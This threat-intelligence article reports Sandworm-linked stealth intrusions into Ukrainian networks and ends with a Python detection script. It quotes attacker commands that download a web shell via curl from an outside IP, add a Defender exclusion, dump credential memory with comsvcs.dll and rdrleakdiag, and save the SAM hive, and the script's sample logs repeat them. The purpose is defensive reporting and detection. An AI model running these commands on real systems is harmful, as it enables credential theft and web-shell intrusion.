Russian Hackers Use Stealth Tactics in Prolonged Attacks on Ukrainian Government Networks

Russian Hackers Employ Stealthy Tactics to Infiltrate Government Networks

Ukrainian government organizations are facing persistent cyber threats from Russian-backed actors employing sophisticated evasion techniques to maintain prolonged access to critical networks. Recent investigations have revealed coordinated campaigns targeting essential infrastructure and government entities, with attackers utilizing advanced methods to circumvent traditional security defenses.

These operations signify a notable escalation in cyberattack strategies, focusing on credential harvesting and the extraction of sensitive information rather than immediate destructive actions. This strategic shift allows threat actors to conduct extensive reconnaissance and maintain covert presence within networks for extended periods.

Analysts have identified two significant intrusion incidents: a two-month operation against a large business services organization and a week-long campaign targeting local government infrastructure. The attackers exhibit exceptional operational security awareness, minimizing malware deployment and primarily relying on legitimate Windows administration tools and dual-use utilities to evade detection.

The campaign appears linked to Sandworm, a Russian military intelligence unit under the GRU, known for destructive attacks against critical infrastructure, including power grids and satellite communications networks.

Living-Off-the-Land Credential Harvesting Mechanisms

The evasion methodology these threat actors employ reflects a deep understanding of modern security controls. Upon gaining initial access, the attackers executed reconnaissance and other commands through built-in Windows utilities, such as:

– `cmd.exe /c curl [malicious IP]:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx`

– `powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads`

Adding a Windows Defender exclusion for the Downloads folder requires administrative privileges, so the attackers had already obtained them by this point. They then created scheduled tasks that ran every thirty minutes, using the legitimate `rundll32.exe` with `comsvcs.dll` to dump process memory and extract the credentials held in it.

The threat actors specifically targeted KeePass password-vault processes through process enumeration commands, showing precise targeting of credential stores. Evasion continued with the Windows Resource Leak Diagnostic tool (`rdrleakdiag`) for memory dumping, a seldom-used technique chosen to slip past security monitoring.

Registry hive exfiltration through native `reg.exe` commands enabled additional credential and configuration data extraction. The campaign showcases threat actors prioritizing stealth over speed, employing legitimate administration tools to maintain attribution ambiguity while systematically harvesting sensitive organizational data throughout extended network access periods.
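The commands described above are all legitimate Windows binaries, so detection has to key on command-line patterns and on the scheduled-task cadence rather than on malware signatures. The following is an added example written for this article, not code from the original report or the investigating vendor: it runs illustrative regexes over constructed process-creation records (timestamp|host|user|command line) and then flags hosts where `comsvcs.dll` dumps recur at roughly the thirty-minute interval the article cites. The rule patterns, host names and IP (203.0.113.10, a documentation range) are assumptions made for the example.

```python
import re
from datetime import datetime

# Heuristics for the living-off-the-land tradecraft described above. The patterns are written
# for this example and are not a vendor's published signatures; tune them before deployment.
RULES = {
    "webshell_dropped_via_curl": re.compile(r"\bcurl\b.*>\s*C:\\inetpub\\wwwroot\\.*\.aspx", re.I),
    "defender_exclusion_added": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "comsvcs_memory_dump": re.compile(r"\brundll32(\.exe)?\b.*\bcomsvcs\.dll", re.I),
    "rdrleakdiag_memory_dump": re.compile(r"\brdrleakdiag(\.exe)?\b", re.I),
    "registry_hive_export": re.compile(r"\breg(\.exe)?\s+save\b.*\bhklm\\(sam|security|system)\b", re.I),
}

# Constructed process-creation records (timestamp|host|user|command line); not real telemetry.
SAMPLE_LOG = """\
2024-01-01T08:00:01Z|SRV-WEB01|IIS APPPOOL\\DefaultAppPool|cmd.exe /c curl 203.0.113.10:22065/service.aspx > C:\\inetpub\\wwwroot\\aspnet_client\\service.aspx
2024-01-01T08:02:17Z|SRV-WEB01|CORP\\admin|powershell Add-MpPreference -ExclusionPath C:\\Users\\admin\\Downloads
2024-01-01T08:30:00Z|SRV-WEB01|NT AUTHORITY\\SYSTEM|rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 704 C:\\Users\\admin\\Downloads\\out.dmp full
2024-01-01T09:00:00Z|SRV-WEB01|NT AUTHORITY\\SYSTEM|rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 704 C:\\Users\\admin\\Downloads\\out2.dmp full
2024-01-01T09:05:40Z|SRV-WEB01|CORP\\admin|rdrleakdiag.exe /p 704 /o C:\\Users\\admin\\Downloads
2024-01-01T09:07:12Z|SRV-WEB01|CORP\\admin|reg.exe save hklm\\sam C:\\Users\\admin\\Downloads\\sam.hiv
2024-01-01T09:08:00Z|SRV-WEB01|CORP\\admin|reg.exe query hklm\\software\\microsoft\\windows\\currentversion
"""

def scan(log_text):
    """Return one (timestamp, host, rule, command) tuple per matching record, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, _user, cmd = line.split("|", 3)
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                hits.append((ts, host, name, cmd))
    return hits

def periodic_dumps(hits, rule="comsvcs_memory_dump", minutes=30, tolerance=2):
    """Hosts on which successive dumps recur at about the scheduled-task interval the article cites."""
    by_host = {}
    for ts, host, name, _cmd in hits:
        if name == rule:
            by_host.setdefault(host, []).append(datetime.fromisoformat(ts.replace("Z", "+00:00")))
    flagged = set()
    for host, times in by_host.items():
        times.sort()
        for earlier, later in zip(times, times[1:]):
            if abs((later - earlier).total_seconds() / 60 - minutes) <= tolerance:
                flagged.add(host)
    return sorted(flagged)
```

The benign `reg.exe query` record is deliberately left unflagged; in production, the same rules would be fed from Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled.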